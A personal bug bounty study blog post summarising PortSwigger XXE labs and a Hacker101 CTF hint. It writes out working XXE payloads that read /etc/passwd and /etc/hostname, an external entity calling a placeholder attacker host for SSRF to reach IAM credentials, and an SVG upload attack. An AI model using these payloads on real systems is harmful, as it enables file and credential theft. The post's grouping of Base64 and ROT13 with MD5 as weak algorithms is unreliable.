Bug Bounty Diaries #8 – XXE

Welcome to the Ethical Hacking Diaries. This is a digest of things I have learned on my journey of becoming a bug bounty hunter in Week #17 of 2020. This last week I haven’t had too much time to study (and motivation, as I started to feel a bit burnt out, that’s usually the time when I tone things down a bit.)

Nevertheless, I have convinced myself to do at least a bit. So I did a bit of Pentesterlabs and learned more about Authentication, I got great support from @Nahamsec while doing a Hacker101 CTF on our bi-weekly Twitch Live Hacking Streams and I did I a bit more Portswigger Labs on the topic of XXE’s (XML External Entities).

https://www.youtube.com/watch?v=WVpWdPUd_5Y

Pentesterlabs

As I have said, I just did a little bit of PTLabs, one noteworthy thing I have put down was about changing Data to the JSON Format to get more information out of it. You’ll find an example below.

This is how the raw data looked like:

And this is what I was able to pull out after looking at the same Data in JSON using the Developer Console.

Pretty interesting. Until then I didn’t even know this was possible.

Twitch Stream

I was streaming on Twitch and had the pleasure of Ben (Nahamsec) joining in my stream and helping me a bit. I was struggling with one challenge on the Hacker101 CTF where a weak algorithm was used on a cookie (Hiding a USER ID). Ben gave me the hint to check the encoded string for weak algorithms like ROT13, Base64 or MD5. Turns out it was MD5 and I was able to decode the string.

Some weak algorithms among many others are:

  1. ROT13
  2. Base64
  3. MD5

Lesson learned.

Portswigger Labs – XXE

I spent the majority of my study time last week on the Portswigger Labs. I find them an excellent resource to study with. I was interested in XXE and have learned a ton about it. Let’s dive in. Part of the Material provided below comes from Portswigger, so credit goes to them.

Types of XXE Attacks

There are several different types of attacks:

What to look for

Keep an eye on the Content-Header in the Request.

If the Header has set Content-Type:application/xml, it is likely that we can try some XXE attacks.

XXE File Retrieval

Below is an example of an XXE File Retrieval Attack. You can see that there is some XML Data being sent in the request body.

We are able to modify the data to retrieve files, in this case, the contents of the /etc/passwd file.

XXE File Retrieval

XXE SSRF Attacks

In this example, the same request as above is made, checking for the stock of an item with the use of XML. This time, we add an external entity definition between the tags so we can link to an external IP Address.

The original XML request:

<?xml version=1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

The modified one including the external entity:

<?xml version=1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://IpOfAttacker/"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

As you can see, we have also replaced the productId of 1 with &xxe; to trigger our payload.

As a response, we should see “Invalid Product ID” followed by a folder name. We now update the URL in our DTD to fuzz the API until we find the information we want, in this case, it’s IAM security credentials.

Blind XXE

XInclude Attacks
Some apps receive client submitted data and embed it on the server into XML documents and then they parse the document.
To use those XInclude Attacks we need to reference the XInclude Namespace and provide the path to a file we want to include:
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Original Request
Modified Request

XXE File Upload

In this example, we abuse the ability to upload .svg files as a profile picture for a forum. We create an empty .svg file and include the following code into it:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Now if you post a comment or a forum post on the forum, you should see the server hostname as your profile picture. Very cool! I was blown away by this.

XXE attacks via modified content type

Most of the POST requests are using a default content type generated by HTML forms like application/x-www-form-urlencoded. Some websites will allow us to send other content types nevertheless, including XML.

Let’s say a request looks like this:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7


foo=bar
We might be able to modify this request to the following and send it:
POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52


<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
If this works, we can leverage this to run some XXE attacks against the Server.

Conclusion Week #17 of 2020

As I have said, a pretty slow week for me but I still learned a ton. This week I have already put a lot of notes down, so next week’s blog will be longer again 🙂 See you next week!

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Share via
Copy link
Powered by Social Snap